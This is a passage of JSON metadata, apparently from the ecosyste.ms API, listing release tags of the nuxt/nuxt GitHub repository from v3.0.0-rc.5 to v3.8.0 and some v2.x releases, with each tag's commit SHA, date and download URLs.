t/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.